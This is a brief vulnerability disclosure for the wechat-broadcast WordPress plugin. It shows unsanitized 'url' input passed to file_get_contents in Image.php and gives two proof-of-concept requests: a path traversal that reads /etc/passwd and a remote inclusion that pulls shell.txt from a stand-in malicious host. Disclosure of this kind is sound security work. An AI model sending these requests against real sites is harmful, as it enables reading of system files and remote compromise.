This bug was found in the file: /wechat-broadcast/wechat/Image.php echo file_get_contents(isset($_GET[“url”]) ? $_GET[“url”] : ‘’); The parameter “url” it is not sanitized allowing include local or remote files To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.
Local File Inclusion POC:
GET
/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
Remote File Inclusion POC:
GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=
http://malicious.url/shell.txt